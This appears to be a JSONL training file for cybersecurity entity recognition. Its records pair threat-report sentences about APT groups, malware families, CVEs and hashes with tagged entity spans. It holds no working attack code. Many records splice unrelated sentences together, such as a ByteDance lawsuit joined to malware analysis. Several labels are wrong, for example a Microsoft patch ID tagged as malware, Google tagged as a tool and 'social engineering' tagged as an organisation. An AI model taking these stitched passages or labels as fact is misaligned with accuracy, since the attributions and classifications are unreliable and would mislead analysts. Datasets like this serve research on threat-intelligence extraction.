{"text": "Conclusion The days when one needed in-depth coding knowledge to develop malware are long gone . Since at least 2011 , these hackers have been using malware to spy on corporate networks . CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to date , and are analyzed in this report : TDTESS backdoor ; Vminst , a lateral movement tool ; NetSrv , a Cobalt Strike loader ; and ZPP , a files compression console program .", "spans": {"THREAT_ACTOR: hackers": [[125, 132]], "TOOL: malware": [[149, 156]], "THREAT_ACTOR: CopyKittens": [[188, 199]], "MALWARE: TDTESS backdoor": [[334, 349]], "MALWARE: Vminst": [[352, 358]], "MALWARE: NetSrv": [[387, 393]], "MALWARE: Cobalt Strike loader": [[398, 418]], "MALWARE: ZPP": [[425, 428]]}, "info": {"id": "cyberner_stix_train_006191", "source": "cyberner_stix_train"}}
{"text": "On the other side , ByteDance has filed a lawsuit suing the Trump administration . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . The following is a technical analysis of thisvariant .", "spans": {"ORGANIZATION: ByteDance": [[20, 29]], "MALWARE: AutoHotKey scripts": [[149, 167]]}, "info": {"id": "cyberner_stix_train_006192", "source": "cyberner_stix_train"}}
{"text": "The second-stage malware is delivered to different destinations with an autorun registry key set respectively .", "spans": {}, "info": {"id": "cyberner_stix_train_006193", "source": "cyberner_stix_train"}}
{"text": "Kill any running process and attempt to delete the associated executable . “ Setup ” command – sends various info about the machine with each iteration of the C2 communications loop .", "spans": {"TOOL: C2": [[159, 161]]}, "info": {"id": "cyberner_stix_train_006194", "source": "cyberner_stix_train"}}
{"text": "The Sofacy group should no longer be an unfamiliar threat at this stage .", "spans": {"THREAT_ACTOR: Sofacy": [[4, 10]]}, "info": {"id": "cyberner_stix_train_006195", "source": "cyberner_stix_train"}}
{"text": ") loaded in memory and injects itself into it For the second scenario , the injection process works like this : The malware opens the target service process . CTU analysis suggests this activity is related to Iranian threat actors closely aligned with or acting on behalf of the COBALT GYPSY threat group ( formerly labeled Threat Group-2889 ) . The loader embedded in the payload seems to be a variant of the Veil \" shellcode_inject \" payload , previously used by OceanLotus to load older versions of Remy backdoor . the malware uses and to get the function Address .", "spans": {"ORGANIZATION: CTU": [[159, 162]], "THREAT_ACTOR: threat actors": [[217, 230]], "THREAT_ACTOR: COBALT GYPSY": [[279, 291]], "THREAT_ACTOR: threat group": [[292, 304]], "THREAT_ACTOR: Threat Group-2889": [[324, 341]], "TOOL: Veil": [[410, 414]], "TOOL: shellcode_inject": [[417, 433]], "THREAT_ACTOR: OceanLotus": [[465, 475]], "MALWARE: Remy backdoor": [[502, 515]], "MALWARE: the malware": [[518, 529]]}, "info": {"id": "cyberner_stix_train_006196", "source": "cyberner_stix_train"}}
{"text": "As mentioned before , our test device was automatically from stage one to stage two , which started collecting data . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . Letter allegedly from the Barcelona B-IDTY branch E-LOC of the SysUpdate has been in use by Budworm since at least 2020 , and the attackers appear to continually develop the tool to improve its capabilities and avoid detection .", "spans": {"MALWARE: Backdoor.Nidiran": [[227, 243]], "MALWARE: SysUpdate": [[409, 418]], "THREAT_ACTOR: Budworm": [[438, 445]], "THREAT_ACTOR: attackers": [[476, 485]]}, "info": {"id": "cyberner_stix_train_006197", "source": "cyberner_stix_train"}}
{"text": "Quite possibly , this routine targets older platforms like Windows 7 and machines not taking advantage of hardware protections like UEFI and SecureBoot , available on Windows 10 . Believed to have started activity in 2009 and to originate from China , the group initially was known for targeting US and overseas defense contractors but broadened their targeting as time passed . OceanLotus : 0 4 name is read from resource P1/0x64 . Symantecs Threat Hunter Team , part of Broadcom , has seen it used in a single attack by a ransomware affiliate that attempted to deploy LockBit on a targets network and then switched to 3AM when LockBit was blocked .", "spans": {"SYSTEM: Windows 7": [[59, 68]], "SYSTEM: Windows 10": [[167, 177]], "THREAT_ACTOR: group": [[256, 261]], "ORGANIZATION: defense contractors": [[312, 331]], "THREAT_ACTOR: OceanLotus": [[379, 389]], "ORGANIZATION: Symantecs Threat Hunter Team": [[433, 461]], "ORGANIZATION: Broadcom": [[472, 480]], "THREAT_ACTOR: ransomware affiliate": [[524, 544]], "MALWARE: LockBit": [[570, 577], [629, 636]], "MALWARE: 3AM": [[620, 623]]}, "info": {"id": "cyberner_stix_train_006198", "source": "cyberner_stix_train"}}
{"text": "This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . Barium Defendants install the malicious credential stealing and injection tool known as \" Win32/RibDoor.A!dha \" .", "spans": {"MALWARE: malware": [[5, 12]], "THREAT_ACTOR: Barium": [[135, 141]], "MALWARE: Win32/RibDoor.A!dha": [[225, 244]]}, "info": {"id": "cyberner_stix_train_006199", "source": "cyberner_stix_train"}}
{"text": "Where possible , we detail the affiliate models with which they are involved and outline the current state of TA505 campaigns .", "spans": {"THREAT_ACTOR: TA505": [[110, 115]]}, "info": {"id": "cyberner_stix_train_006200", "source": "cyberner_stix_train"}}
{"text": "Various versions may also change the index of the split ( e.g . APT5 also targeted the networks of some of Southeast Asia 's major telecommunications providers with Leouncia malware . ZXNC Run ZXNC v1.1 – a simple telnet client . This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly .", "spans": {"ORGANIZATION: telecommunications providers": [[131, 159]], "TOOL: Leouncia malware": [[165, 181]], "VULNERABILITY: previous work exposed publicly": [[395, 425]]}, "info": {"id": "cyberner_stix_train_006201", "source": "cyberner_stix_train"}}
{"text": "This allows it to silently execute any backdoor activity without the user knowing that the device is in an active state . In this new , aggressive campaign we see a return of the Bankshot implant , which last appeared in 2017 . APT33 : e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70 S-SHA2 Remcos . To hide their true location , the threat actor used the ExpressVPN service that showed connections to the web shell ( Notice.php ) on a compromised server coming from two IP addresses in London .", "spans": {"TOOL: Bankshot": [[179, 187]], "THREAT_ACTOR: APT33": [[228, 233]], "MALWARE: e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70 S-SHA2 Remcos": [[236, 314]], "THREAT_ACTOR: threat actor": [[351, 363]], "SYSTEM: ExpressVPN service": [[373, 391]], "TOOL: web shell ( Notice.php )": [[423, 447]]}, "info": {"id": "cyberner_stix_train_006202", "source": "cyberner_stix_train"}}
{"text": "With a better understanding of the “ Agent Smith ” actor than we had in the initial phase of campaign hunting , we examined the list of target innocent apps once again and discovered the actor ’ s unusual practices in choosing targets . To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites . One of the tactics used in operations by these groups is highly targeted spear-phishing messages . Popular tax preparation software companies are under fire from lawmakers for allegedly sharing personal information with social media sites , including Google and Meta .", "spans": {"MALWARE: Agent Smith": [[37, 48]], "ORGANIZATION: Popular tax preparation software companies": [[484, 526]], "ORGANIZATION: lawmakers": [[547, 556]], "TOOL: Google": [[636, 642]], "TOOL: Meta": [[647, 651]]}, "info": {"id": "cyberner_stix_train_006203", "source": "cyberner_stix_train"}}
{"text": "] databit [ . It is highly likely that the Mofang group is a group that operates out of China and is probably government-affiliated . A recently observed malware sample ( hash value 832f5e01be536da71d5b3f7e41938cfb ) appears to be a modified variant of Aumlib . In response to this activity , we built threat hunting campaigns designed to identify additional Exchange Server abuse .", "spans": {"THREAT_ACTOR: Mofang group": [[43, 55]], "FILEPATH: 832f5e01be536da71d5b3f7e41938cfb": [[182, 214]], "MALWARE: Aumlib": [[253, 259]]}, "info": {"id": "cyberner_stix_train_006204", "source": "cyberner_stix_train"}}
{"text": "These website names are generated according to a clear algorithm : the first few letters are suggestive of popular classified ad services , followed by a random string of characters , followed by a two-letter top-level domain . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . Around 55% of the victims of Lazarus were located in India and neighboring countries .", "spans": {"MALWARE: Microsoft Word documents": [[292, 316]], "VULNERABILITY: CVE-2017-0199": [[328, 341]], "THREAT_ACTOR: Lazarus": [[373, 380]]}, "info": {"id": "cyberner_stix_train_006205", "source": "cyberner_stix_train"}}
{"text": "The malware developer uses various tactics to do so , and one of them is using Android 's broadcast receivers . While Buckeye appeared to cease operations in mid-2017 , the Equation Group tools it used continued to be used in attacks until late 2018 . This may indicate the OS requirements of their intended targets but it may also be an attempt to take advantage of a security telemitry blindspot in many enterprises , as is with Penquin Turla and APT28 ’s Linux XAgent variant .", "spans": {"SYSTEM: Android": [[79, 86]], "THREAT_ACTOR: Buckeye": [[118, 125]], "TOOL: Equation Group tools": [[173, 193]], "TOOL: OS": [[274, 276]], "MALWARE: Penquin Turla": [[431, 444]], "THREAT_ACTOR: APT28": [[449, 454]], "SYSTEM: Linux": [[458, 463]], "TOOL: XAgent": [[464, 470]]}, "info": {"id": "cyberner_stix_train_006206", "source": "cyberner_stix_train"}}
{"text": "However , within six months the malicious actors added the capability to infect iOS devices . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia . In late 2017 , Lazarus Group used KillDisk , a disk-wiping tool , in an attack against an online casino based in Central America .", "spans": {"SYSTEM: iOS": [[80, 83]], "MALWARE: Okrum": [[123, 128]], "THREAT_ACTOR: Lazarus Group": [[303, 316]], "MALWARE: KillDisk": [[322, 330]]}, "info": {"id": "cyberner_stix_train_006207", "source": "cyberner_stix_train"}}
{"text": "In 2016 , Unit 42 launched an unprecedented analytic effort focused on developing a modern assessment of the size , scope and complexity of this threat . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": {"ORGANIZATION: Unit 42": [[10, 17]], "THREAT_ACTOR: HELIX KITTEN actors": [[169, 188]], "ORGANIZATION: personnel": [[324, 333]]}, "info": {"id": "cyberner_stix_train_006208", "source": "cyberner_stix_train"}}
{"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection .", "spans": {"THREAT_ACTOR: actors": [[15, 21]], "VULNERABILITY: CVE-2017-0144": [[109, 122]], "MALWARE: MS17-010": [[162, 170]], "FILEPATH: Catchamas": [[173, 182]], "MALWARE: Trojan": [[195, 201]]}, "info": {"id": "cyberner_stix_train_006209", "source": "cyberner_stix_train"}}
{"text": "As of this publication , 40 of the links have been clicked at least once .", "spans": {}, "info": {"id": "cyberner_stix_train_006210", "source": "cyberner_stix_train"}}
{"text": "All results and system information collected from the infected system are stored locally in the device for a period before Outlaw retrieves them via the C&C .", "spans": {"THREAT_ACTOR: Outlaw": [[123, 129]], "TOOL: C&C": [[153, 156]]}, "info": {"id": "cyberner_stix_train_006211", "source": "cyberner_stix_train"}}
{"text": "One of the first changes that stands out is that the screen recording feature mentioned in the previous sample has been removed . Cadelle 's threats are capable of opening a back door and stealing information from victims' computers . While APT12 has previously used THREEBYTE , it is unclear if APT12 was responsible for the recently discovered campaign utilizing THREEBYTE . Cyclops Blink can use non - standard ports for C2 not typically associated with HTTP or HTTPS traffic.[10 ] DarkVishnya used ports 5190 and 7900 for shellcode listeners , and 4444 , 4445 , 31337 for shellcode C2.[11 ]", "spans": {"THREAT_ACTOR: APT12": [[241, 246], [296, 301]], "MALWARE: THREEBYTE": [[267, 276], [365, 374]], "MALWARE: Cyclops Blink": [[377, 390]], "MALWARE: DarkVishnya": [[485, 496]]}, "info": {"id": "cyberner_stix_train_006212", "source": "cyberner_stix_train"}}
{"text": "The command is a constructed string split into three parts using \" \" as a separator . ScarCruft infected this victim on September 21 , 2018 . The resulting screenshot is saved at “ %TMP%/image.png ” , sent back to the attackers by the GRIFFON implant and then deleted . As Nick Biasini explained in a past episode of Talos Takes , name recognition also plays a major part in the rising popularity of this business model .", "spans": {"THREAT_ACTOR: ScarCruft": [[86, 95]], "FILEPATH: %TMP%/image.png": [[181, 196]], "MALWARE: GRIFFON": [[235, 242]], "ORGANIZATION: Nick Biasini": [[273, 285]], "ORGANIZATION: Talos Takes": [[317, 328]]}, "info": {"id": "cyberner_stix_train_006213", "source": "cyberner_stix_train"}}
{"text": "If these files successfully gain root rights , the Trojan will install several tools into the system . Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . Based on data extracted from Bit.ly statistics , we can see that potential victims from many other countries have at least accessed the malicious link . On Feb 12th 2013 , FireEye announced the discovery of an Adobe Reader 0 - day exploit which is used to drop a previously unknown , advanced piece of malware .", "spans": {"DOMAIN: Bit.ly": [[417, 423]], "ORGANIZATION: FireEye": [[560, 567]], "VULNERABILITY: Adobe Reader 0 - day exploit": [[598, 626]]}, "info": {"id": "cyberner_stix_train_006214", "source": "cyberner_stix_train"}}
{"text": "This methodology , known as \" big game hunting \" , signals a shift in operations for WIZARD SPIDER , a criminal enterprise of which GRIM SPIDER appears to be a cell . WildFire properly classifies BBSRAT malware samples as malicious .", "spans": {"ORGANIZATION: WildFire": [[167, 175]], "MALWARE: BBSRAT malware samples": [[196, 218]]}, "info": {"id": "cyberner_stix_train_006216", "source": "cyberner_stix_train"}}
{"text": "Like many other bankers , they were disguised as apps for popular free ad services in Russia . The malware then uses WebDAV to upload the RAR archive to a Box account . The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost .", "spans": {"MALWARE: malware": [[99, 106]], "TOOL: WebDAV": [[117, 123]], "MALWARE: RAR archive": [[138, 149]]}, "info": {"id": "cyberner_stix_train_006217", "source": "cyberner_stix_train"}}
{"text": "Finally , the malware sends the act=done value and return code .", "spans": {}, "info": {"id": "cyberner_stix_train_006218", "source": "cyberner_stix_train"}}
{"text": "The encryption keys in the script were different on every system .", "spans": {}, "info": {"id": "cyberner_stix_train_006219", "source": "cyberner_stix_train"}}
{"text": "DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server . The developers of Bookworm have gone to great lengths to create a modular framework that is very flexible through its ability to run additional modules directly from its C2 server .", "spans": {"TOOL: DDoS malware": [[0, 12]], "MALWARE: Bookworm": [[170, 178]], "TOOL: C2": [[322, 324]]}, "info": {"id": "cyberner_stix_train_006220", "source": "cyberner_stix_train"}}
{"text": "“ tk1 ” will disable all the effects of the “ tk0 ” command , while “ input keyevent 3 ” is the shell command that simulates the pressing of the ‘ home ’ button so all the current activities will be minimized and the user won ’ t suspect anything . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant . APT33 : 367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330 S-SHA2 Remcos . Most recently , the Ransomware and Financial Stability Act was introduced .", "spans": {"VULNERABILITY: CVE-2018-4878": [[288, 301]], "THREAT_ACTOR: attacker": [[314, 322]], "THREAT_ACTOR: APT33": [[370, 375]], "MALWARE: 367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330 S-SHA2 Remcos": [[378, 456]]}, "info": {"id": "cyberner_stix_train_006221", "source": "cyberner_stix_train"}}
{"text": "After thorough analysis we can confirm that Cerberus was indeed not based on the Anubis source code . First described by Kaspersky in 2014 [1] and later , by Cylance in 2017 [2] , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . APT38 's increasingly aggressive targeting against banks and other financial institutions has paralleled North Korea 's worsening financial condition .", "spans": {"MALWARE: Cerberus": [[44, 52]], "MALWARE: Anubis": [[81, 87]], "ORGANIZATION: Kaspersky": [[121, 130]], "ORGANIZATION: Cylance": [[158, 165]], "THREAT_ACTOR: Machete": [[180, 187]], "THREAT_ACTOR: APT38": [[305, 310]], "ORGANIZATION: banks": [[356, 361]], "ORGANIZATION: financial institutions": [[372, 394]]}, "info": {"id": "cyberner_stix_train_006222", "source": "cyberner_stix_train"}}
{"text": "In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations . This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant .", "spans": {"THREAT_ACTOR: admin@338": [[21, 30]], "ORGANIZATION: media organizations": [[89, 108]], "MALWARE: Green Lambert": [[220, 233]], "MALWARE: Blue": [[268, 272]]}, "info": {"id": "cyberner_stix_train_006223", "source": "cyberner_stix_train"}}
{"text": "Smishing ( SMS phishing ) is currently the primary way threat actors are distributing the malware . Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . When executed , the SFX archive will be extracted and the “ 8957.cmd ” will be run . CrowdStrike Falcon will detect the OWASSRF exploit method described in this blog , and will block the method if the prevention setting for • None Monitor Exchange servers for signs of exploitation visible in IIS and Remote PowerShell logs using this script developed by CrowdStrike Services • None Consider application - level controls such as web application firewalls .", "spans": {"THREAT_ACTOR: Night Dragon": [[100, 112]], "ORGANIZATION: social engineering": [[138, 156]], "TOOL: remote administration tools": [[309, 336]], "TOOL: RATs": [[339, 343]], "ORGANIZATION: oil and gas": [[468, 479]], "TOOL: SFX archive": [[528, 539]], "FILEPATH: 8957.cmd": [[568, 576]], "TOOL: CrowdStrike Falcon": [[593, 611]], "SYSTEM: Monitor Exchange servers": [[739, 763]], "ORGANIZATION: CrowdStrike Services": [[863, 883]]}, "info": {"id": "cyberner_stix_train_006224", "source": "cyberner_stix_train"}}
{"text": "The lure text in the phishing email claims the attachment is a calendar of events relevant to the targeted organizations and contained specific instructions regarding the actions the victim would have to take if they had “ trouble viewing the document ” .", "spans": {}, "info": {"id": "cyberner_stix_train_006225", "source": "cyberner_stix_train"}}
{"text": "The Association of State Scientific Centers “ Nauka , ” which coordinates 43 Scientific Centers of the Russian Federation ( SSC RF ) .", "spans": {"ORGANIZATION: The Association of State Scientific Centers": [[0, 43]], "ORGANIZATION: Nauka": [[46, 51]], "ORGANIZATION: Scientific Centers": [[77, 95]], "ORGANIZATION: Russian Federation": [[103, 121]], "ORGANIZATION: SSC": [[124, 127]], "ORGANIZATION: RF": [[128, 130]]}, "info": {"id": "cyberner_stix_train_006226", "source": "cyberner_stix_train"}}
{"text": "The shellcode downloads the next stage payload , which is an executable passed in plaintext , to the temp directory with UrlDownloadToFileA , which it then runs with WinExec .", "spans": {"TOOL: shellcode": [[4, 13]]}, "info": {"id": "cyberner_stix_train_006227", "source": "cyberner_stix_train"}}
{"text": "Among the over 1.4 billion devices protected by Verify Apps , we observed fewer than 3 dozen installs of Chrysaor on victim devices . Commands found in a readme text that was stored in a ZIP archive together with the hacktool THC Hydra in Leafminer 's tool arsenal represent online dictionary attacks on Microsoft Exchange and Remote Desktop Protocol services of regional government servers in Saudi Arabia . This time , two games and one gaming platform application were compromised to include a backdoor . When the victim opened an archive , a second stage dropper executed and a WAV file played like a real voicemail .", "spans": {"SYSTEM: Verify Apps": [[48, 59]], "MALWARE: Chrysaor": [[105, 113]], "TOOL: THC Hydra": [[226, 235]], "THREAT_ACTOR: Leafminer": [[239, 248]]}, "info": {"id": "cyberner_stix_train_006228", "source": "cyberner_stix_train"}}
{"text": "Ploutus-D will load KXCashDispenserLib” library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": {"MALWARE: Ploutus-D": [[0, 9]], "MALWARE: (K3A.Platform.dll)": [[82, 100]], "THREAT_ACTOR: ScarCruft": [[178, 187]], "TOOL: Flash Player": [[226, 238]], "VULNERABILITY: exploit": [[239, 246]], "VULNERABILITY: CVE-2016-4117": [[249, 262]]}, "info": {"id": "cyberner_stix_train_006229", "source": "cyberner_stix_train"}}
{"text": "A company in the chemical industry .", "spans": {"ORGANIZATION: A company in the chemical industry": [[0, 34]]}, "info": {"id": "cyberner_stix_train_006230", "source": "cyberner_stix_train"}}
{"text": "Table 4 below lists the intents that are statically registered in this HenBox variant ’ s AndroidManifest.xml config file , together with a description of what that intent does , and when it would be used . APT41 continuously returns to targeting the video game sector and seems to have matured its campaigns through lessons learned in operations against the industry . Our investigation of APT28 's compromise of WADA 's network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism .", "spans": {"MALWARE: HenBox": [[71, 77]], "THREAT_ACTOR: APT41": [[207, 212]], "ORGANIZATION: video game sector": [[251, 268]], "THREAT_ACTOR: APT28": [[391, 396]], "ORGANIZATION: WADA": [[414, 418]]}, "info": {"id": "cyberner_stix_train_006231", "source": "cyberner_stix_train"}}
{"text": "The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . The malicious loader will use dynamic-link library ( DLL ) hijacking — injecting malicious code into a process of a file/application — on sidebar.exe and launch dllhost.exe ( a normal file ) .", "spans": {"MALWARE: GRIFFON": [[35, 42]], "TOOL: dynamic-link library": [[232, 252]], "TOOL: DLL": [[255, 258]], "FILEPATH: sidebar.exe": [[340, 351]], "FILEPATH: dllhost.exe": [[363, 374]]}, "info": {"id": "cyberner_stix_train_006232", "source": "cyberner_stix_train"}}
{"text": "FAKESPY CODE ANALYSIS Once the user clicks on the malicious link from the SMS message , the app asks them to approve installation from unknown resources . Additionally , with the assistance of FireEye Labs , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . On much of the C2 infrastructure we identified several crimeware family samples .", "spans": {"MALWARE: FAKESPY": [[0, 7]], "ORGANIZATION: FireEye Labs": [[193, 205]], "TOOL: PICKPOCKET": [[271, 281]], "THREAT_ACTOR: APT34": [[323, 328]], "TOOL: C2": [[346, 348]]}, "info": {"id": "cyberner_stix_train_006233", "source": "cyberner_stix_train"}}
{"text": "But attackers were still constantly looking for new methods to steal TANs . Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries . Organizations detected a compromise themselves in 62% of the cases that Mandiant worked in 2017 .", "spans": {"THREAT_ACTOR: threat actor": [[149, 161]], "ORGANIZATION: specific individuals": [[201, 221]], "ORGANIZATION: Mandiant": [[317, 325]]}, "info": {"id": "cyberner_stix_train_006234", "source": "cyberner_stix_train"}}
{"text": "The actor also built solid backend infrastructures which can handle high volume concurrent requests . The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B . Dexphot : 504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5 . Two leading Republican members of the U.S. House came out hours after the Biden administration released the roadmap , saying they would use their respective House panels to , “ exercise strict oversight on CISA ’s efforts ” to implement many of the policies outlined .", "spans": {"ORGANIZATION: development company": [[255, 274]], "MALWARE: CONFUCIUS_A": [[289, 300]], "MALWARE: CONFUCIUS_B": [[305, 316]], "MALWARE: Dexphot": [[319, 326]], "FILEPATH: 504cc403e0b83233f8d20c0c86b0611facc040b868964b4afbda3214a2c8e1c5": [[329, 393]], "ORGANIZATION: U.S. House": [[434, 444]], "ORGANIZATION: Biden administration": [[470, 490]]}, "info": {"id": "cyberner_stix_train_006235", "source": "cyberner_stix_train"}}
{"text": "Remote Template Hashes :", "spans": {"TOOL: Remote Template": [[0, 15]]}, "info": {"id": "cyberner_stix_train_006236", "source": "cyberner_stix_train"}}
{"text": "Microsoft researchers used a combination of anomaly detection and supervised machine learning to reduce the data set and separate meaningful , malware-related anomalies from benign data .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "TOOL: anomaly detection": [[44, 61]], "TOOL: supervised machine learning": [[66, 93]]}, "info": {"id": "cyberner_stix_train_006237", "source": "cyberner_stix_train"}}
{"text": "Installing apps on the system partition makes it harder for the user to remove the app . Kaspersky Lab 's products detect and neutralize the malicious programs and its variants used by the NetTraveler Toolkit , including Trojan-Spy.Win32.TravNet and Downloader.Win32.NetTraveler . It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor . Though few details are currently available about CVE-2023 - 37450 , Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content .", "spans": {"ORGANIZATION: Kaspersky Lab": [[89, 102]], "TOOL: NetTraveler Toolkit": [[189, 208]], "TOOL: Trojan-Spy.Win32.TravNet": [[221, 245]], "TOOL: Downloader.Win32.NetTraveler": [[250, 278]], "THREAT_ACTOR: APT16": [[328, 333]], "MALWARE: ELMER backdoor": [[474, 488]], "VULNERABILITY: CVE-2023 - 37450": [[540, 556]]}, "info": {"id": "cyberner_stix_train_006238", "source": "cyberner_stix_train"}}
{"text": "The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg .", "spans": {"THREAT_ACTOR: SLUB": [[22, 26]], "VULNERABILITY: CVE-2018-8174": [[81, 94]], "FILEPATH: Bemstour": [[131, 139]]}, "info": {"id": "cyberner_stix_train_006239", "source": "cyberner_stix_train"}}
{"text": "Both backdoors ( internally referred to by their authors as “ BastionSolution ” and “ OneDriveSolution ” ) essentially allow the operator to remotely execute commands on the compromised machine .", "spans": {"MALWARE: BastionSolution": [[62, 77]], "MALWARE: OneDriveSolution": [[86, 102]]}, "info": {"id": "cyberner_stix_train_006240", "source": "cyberner_stix_train"}}
{"text": "Malware , phishing , and other threats detected by Microsoft Defender for Endpoint are reported to the Microsoft Defender Security Center , allowing SecOps to investigate mobile threats along with endpoint signals from Windows and other platforms using Microsoft Defender for Endpoint ’ s rich set of tools for detection , investigation , and response . Three months after the Olympics-themed attacks , FireEye observed a new BS2005 campaign labeled \" newtiger \" , which is possibly a reference to an older 2010 campaign labeled \" tiger \" . Please reach out to our unit if you have relevant samples or need assistance in deobfuscating the codes . Indicators of compromise aid information security and IT professionals in detecting data breaches , malware infections , or other threat activity .", "spans": {"SYSTEM: Microsoft Defender": [[51, 69], [253, 271]], "ORGANIZATION: Microsoft Defender Security Center": [[103, 137]], "SYSTEM: Windows": [[219, 226]], "ORGANIZATION: FireEye": [[403, 410]]}, "info": {"id": "cyberner_stix_train_006241", "source": "cyberner_stix_train"}}
{"text": "The server ’ s response is a json , containing a link to a .jar file , class name and method name to be executed with reflection API . PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts . APT10 's malware toolbox shows a clear evolution from malware commonly associated with China-based threat actors towards bespoke in-house malware that has been used in more recent campaigns ; this is indicative of APT10 's increasing sophistication , which is highly likely to continue .", "spans": {"THREAT_ACTOR: PLATINUM": [[135, 143]], "VULNERABILITY: zero-day exploits": [[178, 195]], "THREAT_ACTOR: APT10": [[290, 295], [504, 509]], "THREAT_ACTOR: actors": [[396, 402]]}, "info": {"id": "cyberner_stix_train_006242", "source": "cyberner_stix_train"}}
{"text": "ANTI-EMULATOR TECHNIQUES FakeSpy appears to use multiple techniques to evade detection via the emulator . In addition , during the investigation , we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations . The current Ke3chang campaign leverages the BS2005 malware , while older activity from 2010 - 2011 leveraged BMW , followed by the MyWeb malware sporadically used in between .", "spans": {"MALWARE: FakeSpy": [[25, 32]], "ORGANIZATION: we": [[147, 149]], "THREAT_ACTOR: attacker groups": [[191, 206]], "THREAT_ACTOR: FIN7": [[240, 244]], "MALWARE: BS2005": [[320, 326]], "MALWARE: malware": [[327, 334], [413, 420]], "MALWARE: BMW": [[385, 388]], "MALWARE: MyWeb": [[407, 412]]}, "info": {"id": "cyberner_stix_train_006243", "source": "cyberner_stix_train"}}
{"text": "This means that all apps that were using this file will lose some functionality or even start crashing . Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers . RevengeHotels : 81701c891a1766c51c74bcfaf285854b . When loaded at system boot , the downloader uses a set of mathematical calculations to determine the computer - s unique fingerprint , and in turn uses this data to uniquely encrypt its communications later .", "spans": {"ORGANIZATION: Talos": [[105, 110]], "ORGANIZATION: government": [[217, 227]], "TOOL: VPN": [[396, 399]], "THREAT_ACTOR: RevengeHotels": [[478, 491]], "FILEPATH: 81701c891a1766c51c74bcfaf285854b": [[494, 526]]}, "info": {"id": "cyberner_stix_train_006244", "source": "cyberner_stix_train"}}
{"text": "Suspect You ’ re Infected ? APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed .", "spans": {"THREAT_ACTOR: APT38": [[28, 33]], "THREAT_ACTOR: regime-backed group": [[74, 93]], "ORGANIZATION: financial institutions": [[149, 171]], "VULNERABILITY: exploit": [[210, 217]], "MALWARE: Nidiran": [[238, 245]], "MALWARE: self-extracting executable": [[269, 295]], "FILEPATH: .tmp": [[330, 334]]}, "info": {"id": "cyberner_stix_train_006245", "source": "cyberner_stix_train"}}
{"text": "Over the past few years , we have seen a number of advanced threats and cybercrime groups who have stolen code-signing certificates .", "spans": {}, "info": {"id": "cyberner_stix_train_006246", "source": "cyberner_stix_train"}}
